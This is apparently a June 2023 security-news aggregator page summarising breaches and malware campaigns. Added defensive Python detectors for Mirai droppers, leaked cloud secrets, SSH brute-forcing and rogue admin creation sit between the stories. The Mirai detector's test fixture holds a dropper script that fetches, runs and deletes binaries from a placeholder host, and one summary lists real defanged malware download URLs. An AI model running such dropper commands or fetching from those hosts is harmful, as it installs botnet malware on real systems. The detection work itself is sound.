      Bitdefender has agreed to acquire Horangi Cyber Security to address the growing demand for advanced, streamlined management of cybersecurity, compliance, and governance of multi-cloud environments. As organizations continue to accelerate cloud adoption, they struggle to manage the thousands of configuration settings and permissions, identities, and entitlements presented by multiple cloud providers. According to Gartner, “Misconfigured cloud resources continue to be a primary reason for cloud-related data breaches.” A single point of insight and control across … More


      Autosummary: In a 2023 report, Gartner noted that “CSPM is commonly purchased as part of a cloud-native application protection platform (CNAPP) that includes broader cloud security capabilities such as cloud workload protection platform (CWPP), cloud infrastructure entitlement management (CIEM), Kubernetes security posture management (KSPM), cloud detection and response (CDR).”


      AI cuts treatment time for cancer radiotherapy

      financial industry
      2023-06-27 https://www.bbc.co.uk/news/health-65988768?at_medium=RSS&at_campaign=KARANGA
      The technology will be offered at cost price to all NHS trusts in England, following successful pilot studies.



      Schneider Electric and Siemens Energy are two more victims of a MOVEit attack

      industry
      2023-06-27 https://securityaffairs.com/147865/data-breach/schneider-electric-siemens-energy-moveit.html

      The Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial giants Schneider Electric and Siemens Energy. Both Schneider Electric and Siemens Energy provide […]


      Autosummary: Below is the list of victims added to the group’s leak site: werum.com, Schneider Electric (http://se.com), Siemens Energy (http://siemens-energy.com), UCLA (http://ucla.edu), AbbVie (http://abbvie.com). For the uninitiated, Schneider Electric and Siemens Energy are two more notable victims as they are very large Industrial Control System (#ICS) vendors.


      Siemens Energy confirms data breach after MOVEit data-theft attack

      financial industry
      2023-06-27 https://www.bleepingcomputer.com/news/security/siemens-energy-confirms-data-breach-after-moveit-data-theft-attack/
      Siemens Energy has confirmed that data was stolen during the recent Clop ransomware data-theft attacks using a zero-day vulnerability in the MOVEit Transfer platform. [...]

      Autosummary: It designs, develops, and manufactures a wide range of industrial products, including industrial control systems (ICS), state-of-the-art power, heat generation units, renewable energy systems, on and off-site energy delivery systems, and flexible power transmission solutions.


      Uncovering attacker tactics through cloud honeypots

      industry
      2023-06-26 https://www.helpnetsecurity.com/2023/06/26/cloud-environments-honeypots/

      Attackers typically find exposed “secrets” – pieces of sensitive information that allow access to an enterprise cloud environment — in as little as two minutes and, in many cases, begin exploiting them almost instantly, highlighting the urgent need for comprehensive cloud security, according to Orca Security. Orca’s research was conducted between January and May 2023, beginning with the creation of “honeypots” on nine different cloud environments that simulated misconfigured resources in the cloud to entice … More


      Autosummary: No region is safe. Although 50% of all observed exposed AWS key usage took place in the United States, usage occurred in almost every other region as well, including Canada, APAC, Europe, and South America.


      Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks

      industry
      2023-06-26 https://thehackernews.com/2023/06/chinese-hackers-using-never-before-seen.html
      The newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest. The findings come from CrowdStrike, which is tracking the adversary under the name Vanguard Panda. "The adversary consistently employed ManageEngine

      Autosummary: "The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement," the cybersecurity company said.


      Suncor Energy cyberattack impacts Petro-Canada gas stations

      industry ciber
      2023-06-26 https://www.bleepingcomputer.com/news/security/suncor-energy-cyberattack-impacts-petro-canada-gas-stations/
      Petro-Canada gas stations across Canada are impacted by technical problems preventing customers from paying with credit card or rewards points as its parent company, Suncor Energy, discloses they suffered a cyberattack. [...]

      Autosummary: "At this time, we are not aware of any evidence that customer, supplier, or employee data has been compromised or misused as a result of this situation," reads the Suncor press release.


      Energy company Suncor suffered a cyber attack and its Petro-Canada gas stations reported problems in Canada

      industry
      2023-06-26 https://securityaffairs.com/147834/hacking/petro-canada-suncor-problems.html

      The cyber attack suffered by Suncor Energy impacted payment operations at Petro-Canada gas stations in Canada. Suncor Energy is Canada’s leading integrated energy company that provides oil sands development, production and upgrading, offshore oil and gas, and petroleum refining in Canada and the U.S. It owns the Petro-Canada retail and wholesale distribution networks. A cyber […]




      OpenSSH trojan campaign targets Linux systems and IoT devices

      exploits industry
      2023-06-26 https://www.malwarebytes.com/blog/news/2023/06/openssh-trojan-campaign-targets-linux-systems-and-iot-devices

      Categories: News. Tags: IoT, Linux, OpenSSH, trojan, botnet, IRC, attack, compromise

      Poorly configured Linux and Internet of Things (IoT) devices are at risk of compromise from a cryptojacking campaign.


      Autosummary: The data that is taken includes the operating system version, the network configuration, and the contents of /etc/passwd and /etc/shadow. Open source rootkits are installed on systems which support them, used to further hide malicious files and processes taking place under the hood. The operating system giant has some specific advice for those who may be worried about this attack impacting their business: harden internet-facing devices against attacks; ensure secure configurations for devices; change the default password to a strong one; and block SSH from external access.


      New Cryptocurrency Mining Campaign Targets Linux Systems and IoT Devices

      industry
      2023-06-23 https://thehackernews.com/2023/06/new-cryptocurrency-mining-campaign.html
      Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency. "The threat actors behind the attack use a backdoor that deploys a wide array of tools and components such as rootkits and an IRC bot to steal device resources for mining operations," Microsoft threat intelligence researcher Rotem Sde-Or said.

      Autosummary: Furthermore, it runs a modified version of ZiggyStarTux, an IRC-based distributed denial-of-service (DDoS) client that's capable of executing bash commands issued from the command-and-control (C2) server.


      New Mirai botnet targets tens of flaws in popular IoT devices

      industry
      2023-06-22 https://securityaffairs.com/147750/malware/mirai-botnet-iot-devices.html

      Since March 2023, researchers at Palo Alto Networks Unit 42 have observed a new variant of the Mirai botnet spreading by targeting multiple vulnerabilities in popular IoT devices from D-Link, Zyxel, and Netgear. Below is the […]


      Autosummary: Upon executing the script, it would download and execute the proper bot client for each of the specific Linux architectures: hxxp://185.225.74[.]251/armv4l, hxxp://185.225.74[.]251/armv5l, hxxp://185.225.74[.]251/armv6l, hxxp://185.225.74[.]251/armv7l, hxxp://185.225.74[.]251/mips, hxxp://185.225.74[.]251/mipsel, hxxp://185.225.74[.]251/sh4, hxxp://185.225.74[.]251/x86_64, hxxp://185.225.74[.]251/i686, hxxp://185.225.74[.]251/i586, hxxp://185.225.74[.]251/arc, hxxp://185.225.74[.]251/m68k, hxxp://185.225.74[.]251/sparc. Once the bot client has executed, the shell script downloader deletes the client executable file to avoid detection.
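      The downloader behaviour described in that autosummary (one bot client per CPU architecture fetched from a single host, then the binary deleted after it runs) is a pattern you can score for directly. The following is an added example written for this page, not code from Unit 42 or Security Affairs: the sample scripts, the host 192.0.2.10 and the file names are constructed, and the heuristic (three or more architectures from one host plus delete-after-run) is mine, not Unit 42's detection logic. It also accepts defanged hxxp:// and [.] forms so it can be run over IoC lists like the one above.

```python
"""Score a shell script for the Mirai-style multi-architecture dropper pattern.

Added example, not code from Unit 42 or Security Affairs. The sample scripts
below are constructed for the demo and 192.0.2.10 is a documentation
address, not an indicator.
"""
import re
from collections import defaultdict
from typing import Dict, List

# Architecture names Mirai-family droppers enumerate (the list above plus the
# other names commonly seen in such scripts).
ARCH_NAMES = {
    "armv4l", "armv5l", "armv6l", "armv7l", "arm", "mips", "mipsel", "sh4",
    "x86_64", "x86", "i686", "i586", "arc", "m68k", "sparc", "ppc",
}

# Accept live (http://) and defanged (hxxp://, [.]) forms so the same code
# runs on raw scripts and on IoC write-ups.
URL_RE = re.compile(r"h[xt]{2}ps?://([A-Za-z0-9.\[\]-]+)(?::\d+)?/([A-Za-z0-9._/-]+)")
EXEC_RE = re.compile(r"(?:^|[;&|\s])\./([A-Za-z0-9._-]+)")
DELETE_RE = re.compile(r"\brm\s+(?:-[rf]+\s+)*(?:\./)?([A-Za-z0-9._-]+)")


def extract_downloads(script: str) -> Dict[str, List[str]]:
    """Map each download host to the basenames of the paths fetched from it."""
    per_host: Dict[str, List[str]] = defaultdict(list)
    for host, path in URL_RE.findall(script):
        per_host[host.replace("[.]", ".")].append(path.rsplit("/", 1)[-1])
    return dict(per_host)


def score_downloader(script: str) -> dict:
    """Return a verdict plus the evidence behind it."""
    best_host, archs = "", set()
    for host, names in extract_downloads(script).items():
        hit = {n for n in names if n.lower() in ARCH_NAMES}
        if len(hit) > len(archs):
            best_host, archs = host, hit
    executed = set(EXEC_RE.findall(script))
    deleted = set(DELETE_RE.findall(script))
    self_delete = bool(executed & deleted)  # same file run, then removed
    # Three or more architectures from one host plus delete-after-run is the
    # dropper behaviour described above; either trait alone is too common.
    verdict = "mirai_style_downloader" if len(archs) >= 3 and self_delete else "benign"
    return {"host": best_host, "arch_count": len(archs), "self_delete": self_delete, "verdict": verdict}


SAMPLE_SCRIPT = """#!/bin/sh
cd /tmp || cd /var/run
wget http://192.0.2.10/armv7l -O armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l
wget http://192.0.2.10/mips -O mips; chmod +x mips; ./mips; rm -rf mips
wget http://192.0.2.10/x86_64 -O x86_64; chmod +x x86_64; ./x86_64; rm -rf x86_64
wget http://192.0.2.10/sparc -O sparc; chmod +x sparc; ./sparc; rm -rf sparc
"""

BENIGN_SCRIPT = """#!/bin/sh
curl -fsSL https://example.com/install.sh -o install.sh
sh install.sh
"""

if __name__ == "__main__":
    print(score_downloader(SAMPLE_SCRIPT))
    print(score_downloader(BENIGN_SCRIPT))
```

      The two-trait rule matters: a single architecture download plus cleanup is what many legitimate installers do, and a multi-architecture fetch without execution is what a mirror sync looks like. Requiring both keeps the false-positive rate down when this runs over captured /tmp artefacts or honeypot uploads.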


      Startup Security Tactics: Friction Surveys

      industry
      2023-06-21 https://thehackernews.com/2023/06/startup-security-tactics-friction.html
      When we do quarterly planning, my team categorizes our goals within four evergreen outcomes: reduce the risk of information security incidents; increase trust in Vanta's information security program; reduce the friction caused by information security controls; use security expertise to support the business. In this article, I'm going to focus on number three: reducing friction. Declaring your

      Autosummary: Excellent philosophy for the security team [...] it's just awesome; too many security teams view security as an exclusive tradeoff between team operating power and security. Hidden friction: sometimes, when introducing new security controls, you are making a well-considered tradeoff between security and user experience.


      iOttie discloses data breach after site hacked to steal credit cards

      financial industry
      2023-06-21 https://www.bleepingcomputer.com/news/security/iottie-discloses-data-breach-after-site-hacked-to-steal-credit-cards/
      Car mount and mobile accessory maker iOttie warns that its site was compromised for almost two months to steal online shoppers' credit cards and personal information. [...]

      Autosummary: iOttie has not shared how many customers were impacted but said that names, personal information, and payment information could have been stolen, including financial account numbers, credit and debit card numbers, security codes, access codes, passwords, and PINs.


      Cymulate Exposure Analytics provides users with an attacker’s view of their cyber resilience

      industry
      2023-06-20 https://www.helpnetsecurity.com/2023/06/20/cymulate-exposure-analytics/

      Cymulate released a new solution for organizations to run an informed continuous threat exposure management (CTEM) program. The CTEM program, which was coined by Gartner is designed to diagnose the severity of exposures, create an action plan for remediation and facilitate a common language for discussions between business and technical teams. Disparate data sources, point-in-time collection, and lack of business context create challenges for cybersecurity teams to ingest and contextualize exposure data and translate it … More


      Autosummary: Correlated analysis from Cymulate and multi-vendor data that assesses on-premises and cloud attack surfaces, risky assets, attack paths, vulnerabilities, and business impact. Prioritization: vulnerability prioritization and remediation guidance based on multi-vendor aggregated data that is normalized, contextualized, and evaluated against breach feasibility. Validation: analyze exposure severity, security integrity, and effectiveness of remediation from security validation assessment data. Mobilization: utilize Cymulate contextualized data to understand various response outcome options, and establish and track performance against baselines, benchmarks, and risk profiles. “Cymulate has always taken an attacker’s view on cybersecurity defense, and through our experience in breach and attack simulation we have carefully studied the ways attackers creatively exploit vulnerabilities and other exposures driven by human error, misconfiguration, or control weaknesses,” said Avihai Ben-Yossef, CTO of Cymulate.


      Honduras prison violence: At least 41 killed in women's jail riot

      industry
      2023-06-20 https://www.bbc.co.uk/news/world-latin-america-65969092?at_medium=RSS&at_campaign=KARANGA
      The country's president says she will take "drastic measures" after the loss of at least 41 lives.



      Introducing AI-guided Remediation for IaC Security / KICS

      industry
      2023-06-19 https://thehackernews.com/2023/06/introducing-ai-guided-remediation-for.html
      While the use of Infrastructure as Code (IaC) has gained significant popularity as organizations embrace cloud computing and DevOps practices, the speed and flexibility that IaC provides can also introduce the potential for misconfigurations and security vulnerabilities. IaC allows organizations to define and manage their infrastructure using machine-readable configuration files, which are

      Autosummary: For example, improperly configured firewall rules, open ports, or lack of network segmentation can lead to unauthorized access, network attacks, or data exfiltration. Common misconfigurations include weak access controls, improperly exposed ports, insecure network configurations, or mismanaged encryption settings. Secrets, such as API keys, database passwords, or encryption keys, are sensitive pieces of information that should never be exposed or shared inadvertently.
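      The secrets point in that autosummary and the Orca honeypot findings earlier on this page (exposed AWS keys picked up and used within minutes) are the same problem seen from two ends: the key leaves in a config file, and someone else finds it first. The following is an added example for this page, not code from Orca Security or from the KICS project. It pairs a pattern check for AWS access key IDs with a Shannon-entropy check on literal values assigned to secret-looking names, skips values that only reference a variable, and runs over a constructed Terraform-style snippet. The snippet, the name and placeholder patterns, and the 4.3-bit threshold are assumptions of mine; the key pair is the placeholder pair from AWS's own documentation, not a live credential.

```python
"""Find hard-coded cloud credentials in IaC and config text before it ships.

Added example, not code from Orca Security or from the KICS project. The
Terraform-style snippet below is constructed; the key values are the
placeholder credentials from AWS's own documentation, not live keys.
"""
import math
import re
from typing import List, Tuple

# Long-term (AKIA) and temporary (ASIA) AWS access key IDs: prefix + 16 base32 chars.
AWS_KEY_ID_RE = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")
# name = "literal" or name: "literal" with a literal of at least 16 characters.
ASSIGN_RE = re.compile(r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\s*[:=]\s*[\"'](?P<val>[^\"']{16,})[\"']")
SECRET_NAME_RE = re.compile(r"secret|passw(or)?d|token|api_?key|private_?key", re.I)
# Values that are references or obvious placeholders, not leaked material.
PLACEHOLDER_RE = re.compile(r"^(\$\{|var\.|\{\{|<[^>]*>$|change_?me|xxx+)", re.I)


def shannon_entropy(s: str) -> float:
    """Bits per character: random base64 lands near 5 or above, English text around 4 or below."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def scan(text: str, entropy_threshold: float = 4.3) -> List[Tuple[int, str, str, str]]:
    """Return (line_no, rule, severity, evidence) for each suspected secret.

    Any literal under a secret-like name is reported (hard-coding is the bug);
    entropy only decides severity, because a dictionary passphrase has low
    entropy yet is still a leaked credential.
    """
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for m in AWS_KEY_ID_RE.finditer(line):
            findings.append((no, "aws-access-key-id", "high", m.group(0)))
        for m in ASSIGN_RE.finditer(line):
            name, val = m["name"], m["val"]
            if not SECRET_NAME_RE.search(name) or PLACEHOLDER_RE.match(val):
                continue
            severity = "high" if shannon_entropy(val) >= entropy_threshold else "medium"
            findings.append((no, "hardcoded-secret", severity, f"{name}={val[:4]}..."))
    return findings


SAMPLE_TF = '''# constructed Terraform-style snippet; the key pair is the AWS documentation example
provider "aws" {
  region     = "eu-west-1"
  access_key = "AKIAIOSFODNN7EXAMPLE"
  secret_key = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
}
locals {
  db_password = "correct horse battery staple"
  api_token   = "${var.api_token}"
  description = "this string is long but it is not a secret"
}
'''

if __name__ == "__main__":
    for line_no, rule, severity, evidence in scan(SAMPLE_TF):
        print(f"line {line_no}: {rule} [{severity}] {evidence}")
```

      Two design choices worth noting. The evidence field truncates the value to four characters so the scanner's own output does not become a second copy of the secret in CI logs. And the passphrase on the db_password line is reported at medium severity even though its entropy is well under the threshold: an entropy-only scanner would miss it, which is why the name match, not the entropy, decides whether something is reported at all.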


      Hackers use fake OnlyFans pics to drop info-stealing malware

      exploits industry
      2023-06-19 https://www.bleepingcomputer.com/news/security/hackers-use-fake-onlyfans-pics-to-drop-info-stealing-malware/
      A malware campaign is using fake OnlyFans content and adult lures to install a remote access trojan known as "DcRAT," allowing threat actors to steal data and credentials or deploy ransomware on the infected device. [...]

      Autosummary: OnlyFans is a content subscription service where paid subscribers can access private photos, videos, and posts from adult models, celebrities, and social media personalities.


      From Cryptojacking to DDoS Attacks: Diicot Expands Tactics with Cayosin Botnet

      industry
      2023-06-17 https://thehackernews.com/2023/06/from-cryptojacking-to-ddos-attacks.html
      Cybersecurity researchers have discovered previously undocumented payloads associated with a Romanian threat actor named Diicot, revealing its potential for launching distributed denial-of-service (DDoS) attacks. "The Diicot name is significant, as it's also the name of the Romanian organized crime and anti-terrorism policing unit," Cado Security said in a technical report. "In addition,

      Autosummary: History - a shell script that's designed to run Update. The SSH brute-forcer tool (aka aliases), for its part, parses the text file output of Chrome to break into each of the identified IP addresses, and if successful, establishes a remote connection to the IP address.
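      Both the Diicot brute-forcer described here and the OpenSSH trojan campaign listed earlier on this page get their foothold the same way: password-guessing against SSH that is reachable from the internet, on hosts still running default or weak credentials. The following is an added example for this page, not code from Cado Security, Microsoft or any source listed here. detect_bruteforce() walks sshd log lines, counts failed logins per source inside a sliding window and records whether a flagged source later logged in; audit_sshd_config() checks an sshd_config text for the settings that the Microsoft hardening advice above targets. The log lines, the hostname, the 203.0.113.0/24 addresses, the config excerpt and the thresholds are all constructed assumptions.

```python
"""Flag SSH password-guessing in auth.log and audit the sshd settings that let it work.

Added example, not code from Cado Security, Microsoft or any source on this
page. Log lines, hostnames, the 203.0.113.0/24 addresses and the config
excerpt are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Tuple

_PREFIX = r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
FAIL_RE = re.compile(_PREFIX + r"Failed password for (?:invalid user )?(?P<user>\S+) "
                     r"from (?P<ip>[\d.]+) port \d+ ssh2$")
ACCEPT_RE = re.compile(_PREFIX + r"Accepted (?:password|publickey) for (?P<user>\S+) "
                       r"from (?P<ip>[\d.]+) port \d+ ssh2$")


def _parse_ts(ts: str, year: int = 2023) -> datetime:
    # syslog timestamps carry no year; the caller supplies it.
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines: List[str], threshold: int = 5, window_s: int = 60) -> Dict[str, dict]:
    """Return {source_ip: evidence} for sources with >= threshold failures inside window_s.

    A later 'Accepted' login from a flagged source is recorded too: a guess
    that worked is the alert to handle first.
    """
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    total: Dict[str, int] = defaultdict(int)
    users: Dict[str, set] = defaultdict(set)
    flagged: Dict[str, dict] = {}
    for line in lines:
        m = FAIL_RE.match(line)
        if m:
            ip, t = m["ip"], _parse_ts(m["ts"])
            q = recent[ip]
            q.append(t)
            while (t - q[0]).total_seconds() > window_s:  # slide the window
                q.popleft()
            total[ip] += 1
            users[ip].add(m["user"])
            if len(q) >= threshold:
                entry = flagged.setdefault(ip, {"first_seen": q[0], "users": users[ip], "succeeded": False})
                entry["failures"] = total[ip]
            continue
        m = ACCEPT_RE.match(line)
        if m and m["ip"] in flagged:
            flagged[m["ip"]].update(succeeded=True, user=m["user"])
    return flagged


# directive -> (value that weakens SSH, value to set instead); keys lowercased.
WEAK_SETTINGS = {
    "permitrootlogin": ("yes", "prohibit-password"),
    "passwordauthentication": ("yes", "no"),
    "permitemptypasswords": ("yes", "no"),
}
# What sshd assumes when the file leaves the directive unset.
SSHD_DEFAULTS = {"permitrootlogin": "prohibit-password",
                 "passwordauthentication": "yes", "permitemptypasswords": "no"}


def audit_sshd_config(text: str) -> List[Tuple[str, str, str]]:
    """Return (directive, effective value, recommended value) for each weak setting.

    sshd honours the first occurrence of a directive and ignores later ones, so a
    hardening line appended below an existing 'yes' changes nothing. Match blocks
    are not modelled here.
    """
    effective = dict(SSHD_DEFAULTS)
    seen = set()
    for raw in text.splitlines():
        parts = raw.split("#", 1)[0].strip().replace("=", " ").split(None, 1)
        if len(parts) != 2:
            continue
        key, val = parts[0].lower(), parts[1].strip().lower()
        if key in WEAK_SETTINGS and key not in seen:
            seen.add(key)
            effective[key] = val
    return [(k, effective[k], fix) for k, (bad, fix) in WEAK_SETTINGS.items() if effective[k] == bad]


SAMPLE_LOG = [  # constructed sshd lines
    "Jun 14 10:02:01 edge sshd[911]: Failed password for invalid user admin from 203.0.113.7 port 40122 ssh2",
    "Jun 14 10:02:03 edge sshd[912]: Failed password for invalid user pi from 203.0.113.7 port 40124 ssh2",
    "Jun 14 10:02:05 edge sshd[913]: Failed password for root from 203.0.113.7 port 40126 ssh2",
    "Jun 14 10:02:06 edge sshd[914]: Failed password for root from 203.0.113.7 port 40127 ssh2",
    "Jun 14 10:02:08 edge sshd[915]: Failed password for root from 203.0.113.7 port 40129 ssh2",
    "Jun 14 10:02:09 edge sshd[916]: Accepted password for root from 203.0.113.7 port 40131 ssh2",
    "Jun 14 10:05:30 edge sshd[930]: Failed password for alice from 203.0.113.9 port 50000 ssh2",
    "Jun 14 10:05:40 edge sshd[931]: Accepted publickey for alice from 203.0.113.9 port 50001 ssh2",
]

SAMPLE_SSHD_CONFIG = """# constructed sshd_config excerpt
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PermitRootLogin no   # ignored by sshd: the first value above wins
"""

if __name__ == "__main__":
    for ip, ev in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, ev)
    for directive, current, fix in audit_sshd_config(SAMPLE_SSHD_CONFIG):
        print(f"{directive}: {current} -> set {fix}")
```

      The sshd_config check deliberately reports the first PermitRootLogin value and ignores the later "no", because that is what sshd itself does; appending hardening lines to the end of a config that already sets the directive is a common way to believe a host is fixed when it is not. On a host where password authentication really must stay on, the brute-force detector is the compensating control, and the succeeded flag is what should page someone.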


      Oil and gas giant Shell is another victim of Clop ransomware attacks

      exploits ransomware industry
      2023-06-16 https://securityaffairs.com/147545/cyber-crime/shell-clop-ransomware-attacks.html

      British multinational oil and gas company Shell has confirmed that it is one of the victims of the recent large-scale ransomware campaign conducted by the Clop gang exploiting a MOVEit zero-day vulnerability. Threat actors are actively exploiting the zero-day vulnerability, tracked […]




      How cybercriminals target energy companies

      industry ciber
      2023-06-15 https://www.helpnetsecurity.com/2023/06/15/how-cybercriminals-target-energy-companies-video/

      In this Help Net Security video, Jim Simpson, Director of Threat Intelligence at Searchlight Cyber, discusses how cybercriminals employ specialized strategies when targeting energy companies. This is primarily due to the sensitive and valuable information these organizations hold and their critical role in infrastructure, making them particularly attractive for economic and geopolitical disruption. Energy companies are routinely discussed on dark web forums, with threat actors frequently auctioning initial access via remote software, VPNs, and stolen … More



      Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities

      exploits industry
      2023-06-15 https://thehackernews.com/2023/06/vidar-malware-using-new-tactics-to.html
      The threat actors behind the Vidar malware have made changes to their backend infrastructure, indicating attempts to retool and conceal their online trail in response to public disclosures about their modus operandi. "Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia," cybersecurity company Team Cymru said in a new analysis shared

      Autosummary: "By using VPN infrastructure, which in at least part was also utilized by numerous other benign users, it is apparent that the Vidar threat actors may be taking steps to anonymize their management activities by hiding in general Internet noise," Team Cymru noted.


      Cynerio partners with Microsoft to ensure the security of medical and IoT devices

      industry
      2023-06-13 https://www.helpnetsecurity.com/2023/06/13/cynerio-microsoft/

      Cynerio collaborates with Microsoft to integrate with their cloud-native SIEM and SOAR offering Microsoft Sentinel. This collaboration aims to provide the healthcare industry with a comprehensive solution to address the growing security challenges posed by medical and IoT devices. As Leon Lerman, CEO of Cynerio, explains, “Medical and IoT devices are a black hole in the network that traditional IT security and inventory systems simply do not cover. As a result, customers are often left … More



      New PowerDrop Malware Targeting U.S. Aerospace Industry

      exploits industry
      2023-06-07 https://thehackernews.com/2023/06/new-powerdrop-malware-targeting-us.html
      An unknown threat actor has been observed targeting the U.S. aerospace industry with a new PowerShell-based malware called PowerDrop. "PowerDrop uses advanced techniques to evade detection such as deception, encoding, and encryption," according to Adlumin, which found the malware implanted in an unnamed domestic aerospace defense contractor in May 2023. "The name is derived from the tool,



      New PowerDrop malware targets U.S. aerospace defense industry

      exploits industry
      2023-06-07 https://securityaffairs.com/147168/apt/powerdrop-targets-aerospace.html

      A previously unknown threat actor has been observed targeting the U.S. aerospace defense sector with a new PowerShell malware dubbed PowerDrop. Researchers from the Adlumin Threat Research discovered a new malicious PowerShell script, dubbed PowerDrop, that was employed in attacks aimed at organizations in the U.S. aerospace sector. The PowerShell-based malware uses advanced techniques to […]


      Autosummary: “It highlights the importance of having dedicated 24/7 cybersecurity teams within any operational landscape.”


      VMware fixes critical vulnerability in vRealize network analytics tool

      exploits industry
      2023-06-07 https://www.bleepingcomputer.com/news/security/cisco-fixes-critical-vulnerability-in-vrealize-network-analytics-tool/
      VMware issued multiple security patches today to address critical and high-severity vulnerabilities in VMware Aria Operations for Networks, allowing attackers to gain remote execution or access sensitive information. [...]



      0mega ransomware gang changes tactics

      exploits ransomware industry
      2023-06-07 https://www.helpnetsecurity.com/2023/06/07/0mega-ransomware-gang-changes-tactics/

      A number of ransomware gangs have stopped using malware to encrypt targets’ files and have switched to a data theft/extortion approach to get paid; 0mega – a low-profile and seemingly not very active threat actor – seems to be among them. About the 0mega ransomware operation: 0mega (spelled with a zero) is a relative newcomer to the ransomware/extortion business. Evidence of its activities was first spotted roughly a year ago, when one victim – a … More


      Autosummary: The attackers first compromised one of the company’s Microsoft Global admin service accounts that did not have multi-factor authentication enabled, then used it to create a new Microsoft AD user called 0mega and added various permissions to it (Global Administrator, SharePoint Administrator, Exchange Administrator, Teams Administrator).
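      That sequence (a Global admin service account with no MFA creates a fresh user, then stacks Global, SharePoint, Exchange and Teams Administrator roles onto it within minutes) is a tight enough pattern to alert on from the directory audit log alone. The following is an added example for this page, not code from the Help Net Security article or the researchers it cites. detect_new_admin() correlates user-creation events with privileged-role grants to that same new account inside a short window, and raises severity when the creator or the granter has no MFA method registered. The event shape, the account names, the corp.example tenant and the MFA table are constructed simplifications of mine, not the real Entra ID audit log schema; real logs need a field-mapping step before they can be fed in.

```python
"""Catch the 0mega playbook in a directory audit trail.

Added example, not code from the Help Net Security article or the researchers
it cites. The event shape, account names and MFA table are constructed
simplifications, not the real Entra ID audit log schema.
"""
from datetime import datetime, timedelta
from typing import Dict, List

PRIVILEGED_ROLES = {
    "Global Administrator", "SharePoint Administrator", "Exchange Administrator",
    "Teams Administrator", "Privileged Role Administrator",
    "Privileged Authentication Administrator",
}


def detect_new_admin(events: List[Dict], mfa_registered: Dict[str, bool],
                     window: timedelta = timedelta(hours=24)) -> List[Dict]:
    """Return one alert per newly created user granted a privileged role within `window`.

    events: records with keys time (ISO 8601), activity, actor, target and, for
    role grants, role. mfa_registered: actor -> has any MFA method registered.
    """
    created: Dict[str, Dict] = {}   # new user -> its 'Add user' event
    alerts: Dict[str, Dict] = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["activity"] == "Add user":
            created[ev["target"]] = ev
            continue
        if ev["activity"] != "Add member to role" or ev.get("role") not in PRIVILEGED_ROLES:
            continue
        birth = created.get(ev["target"])
        if birth is None:
            continue  # an existing account being promoted is a different, weaker signal
        age = datetime.fromisoformat(ev["time"]) - datetime.fromisoformat(birth["time"])
        if age > window:
            continue
        alert = alerts.setdefault(ev["target"], {
            "new_user": ev["target"], "created_by": birth["actor"],
            "roles": [], "severity": "high",
        })
        alert["roles"].append(ev["role"])
        # A creator or granter without MFA is exactly the foothold described above.
        if not (mfa_registered.get(ev["actor"], False) and mfa_registered.get(birth["actor"], False)):
            alert["severity"] = "critical"
    return list(alerts.values())


SAMPLE_EVENTS = [  # constructed; corp.example is a placeholder tenant
    {"time": "2023-05-01T02:10:00", "activity": "Add user",
     "actor": "svc-backup@corp.example", "target": "0mega@corp.example"},
    {"time": "2023-05-01T02:11:30", "activity": "Add member to role", "actor": "svc-backup@corp.example",
     "target": "0mega@corp.example", "role": "Global Administrator"},
    {"time": "2023-05-01T02:12:00", "activity": "Add member to role", "actor": "svc-backup@corp.example",
     "target": "0mega@corp.example", "role": "SharePoint Administrator"},
    {"time": "2023-05-01T02:12:20", "activity": "Add member to role", "actor": "svc-backup@corp.example",
     "target": "0mega@corp.example", "role": "Exchange Administrator"},
    {"time": "2023-05-01T02:12:40", "activity": "Add member to role", "actor": "svc-backup@corp.example",
     "target": "0mega@corp.example", "role": "Teams Administrator"},
    # Routine onboarding: a new hire gets a non-privileged role.
    {"time": "2023-05-01T09:00:00", "activity": "Add user",
     "actor": "hr-admin@corp.example", "target": "new.hire@corp.example"},
    {"time": "2023-05-01T09:05:00", "activity": "Add member to role", "actor": "hr-admin@corp.example",
     "target": "new.hire@corp.example", "role": "Directory Readers"},
    # A promotion eight days after creation falls outside the window.
    {"time": "2023-05-09T10:00:00", "activity": "Add member to role", "actor": "it-lead@corp.example",
     "target": "new.hire@corp.example", "role": "Exchange Administrator"},
]
MFA_REGISTERED = {"svc-backup@corp.example": False, "hr-admin@corp.example": True,
                  "it-lead@corp.example": True}

if __name__ == "__main__":
    for alert in detect_new_admin(SAMPLE_EVENTS, MFA_REGISTERED):
        print(alert)
```

      The creation-to-grant window is the discriminator: legitimate onboarding grants low-privilege roles, and legitimate promotions of existing accounts happen long after creation and usually through a request workflow. Checking MFA on both the creator and the granter, rather than on the new account, is what ties the alert back to the root cause in this case, an unprotected service account holding Global admin.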


      VMware fixes critical vulnerability in vRealize network analytics tool

      exploits industry
      2023-06-07 https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-vulnerability-in-vrealize-network-analytics-tool/
      VMware issued multiple security patches today to address critical and high-severity vulnerabilities in VMware Aria Operations for Networks, allowing attackers to gain remote execution or access sensitive information. [...]



      VMware fixes critical vulnerabilities in vRealize network analytics tool

      industry
      2023-06-07 https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-vulnerabilities-in-vrealize-network-analytics-tool/
